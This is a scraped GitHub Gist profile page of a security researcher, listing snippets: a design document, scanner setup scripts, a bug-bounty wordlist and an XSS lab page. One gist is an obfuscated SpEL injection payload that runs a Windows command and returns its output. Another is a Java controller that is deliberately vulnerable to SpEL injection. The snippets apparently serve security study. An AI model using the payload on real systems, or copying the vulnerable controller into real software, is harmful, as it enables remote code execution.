Skip to content

Instantly share code, notes, and snippets.

View xvnpw's full-sized avatar

Marcin Niemiec xvnpw

View GitHub Profile
@xvnpw
xvnpw / design-refined.md
Last active October 30, 2024 12:39
create design document with Fabric

DESIGN DOCUMENT

BUSINESS POSTURE

The business priorities and goals for AI Nutrition-Pro are to enhance the efficiency and personalization of diet creation for dietitians by integrating with existing meal planner applications. The key objectives are to provide a seamless and secure backend API service that can reproduce the personal style of nutrition specialists using Large Language Models (LLMs).

Most important business risks include:

  1. Ensuring data privacy and protection, especially concerning Personally Identifiable Information (PII) and personal health data.
  2. Maintaining high availability and reliability of the API service.
@xvnpw
xvnpw / example_refine_design_document.sh
Created October 29, 2024 07:48
how to use Fabric's refine_design_document pattern
# refine_design_document - Refine a design document based on a design review. The prompt involves deep contemplation of the input to ensure a thorough understanding before proceeding. The expected output is a revised design document presented in valid Markdown format
# check fabric https://github.com/danielmiessler/fabric
# check refine_design_document pattern https://github.com/danielmiessler/fabric/blob/main/patterns/refine_design_document/system.md
# how to use it:
# 1. Create DESIGN.md - design document for anything you want
echo "DESIGN DOCUMENT" > design.md
vim design.md # create content
@xvnpw
xvnpw / anchore_example.sh
Created February 1, 2021 21:46
anchore example
# first install anchore engine in local docker
curl https://engine.anchore.io/docs/quickstart/docker-compose.yaml > docker-compose.yaml
docker-compose up -d
# check feed list
docker-compose exec api anchore-cli system feeds list
# turn on admin user for ACR in azure portal
# get admin user password
az acr credential show --name testacr1231445
@xvnpw
xvnpw / scoutsuite_docker.sh
Last active February 1, 2021 21:34
run scoutsuite in docker
docker run -it --rm -v "$PWD":/tmp/host python:3.8 /bin/bash
curl -sL https://aka.ms/InstallAzureCLIDeb | bash
az login
apt install virtualenv
virtualenv -p python3 venv
source venv/bin/activate
pip install scoutsuite
(T(org.springframework.util.StreamUtils).copy(T(java.lang.Runtime).getRuntime().exec("cmd "+T(java.lang.String).valueOf(T(java.lang.Character).toChars(0x2F))+"c "+T(java.lang.String).valueOf(new char[]{T(java.lang.Character).toChars(100)[0],T(java.lang.Character).toChars(105)[0],T(java.lang.Character).toChars(114)[0]})).getInputStream(),T(org.springframework.web.context.request.RequestContextHolder).currentRequestAttributes().getResponse().getOutputStream()))
@xvnpw
xvnpw / spel.java
Created July 16, 2020 10:12
Java service using SpEL in insecure way
@RestController
public class SpELController {
@GetMapping("/exp")
@ResponseBody
public String exp(@RequestParam("value") String value) {
SpelExpressionParser parser = new SpelExpressionParser();
StandardEvaluationContext context = new StandardEvaluationContext();
Expression exp = parser.parseExpression(value);
@xvnpw
xvnpw / server.py
Created June 14, 2020 07:30
server.py - custom http.server
from http.server import HTTPServer, BaseHTTPRequestHandler
import socketserver
import urllib.parse
import sys
import logging
logger = logging.getLogger('server')
logger.setLevel(logging.DEBUG)
fh = logging.FileHandler('server.log')
logger.addHandler(fh)
@xvnpw
xvnpw / wordlist.txt
Created May 31, 2020 11:46 — forked from random-robbie/wordlist.txt
bruteforce wordlist for bug bountys
This file has been truncated, but you can view the full file.
20-ev-allgemein
20-years
200
2000
20000719
2001
2001cc
2002
2003
2004
<input style=width:100% autocomplete=off id=url><br>
<select id=mode>
<option value=none>No security</option>
<option value=blacklist>Blacklist</option>
<option value=whitelist>Whitelist</option>
</select>
<hr>
<h2>Profile page</h2>
<p>My profile page url: <a id=addr></a></p>
<script>
<input style=width:100% autocomplete=off id=url><br>
<select id=mode>
<option value=none>Brak zabezpieczeń</option>
<option value=blacklist>Blacklista</option>
<option value=whitelist>Whitelista</option>
</select>
<hr>
<h2>Strona profilowa</h2>
<p>Adres strony domowej: <a id=addr></a></p>
<script>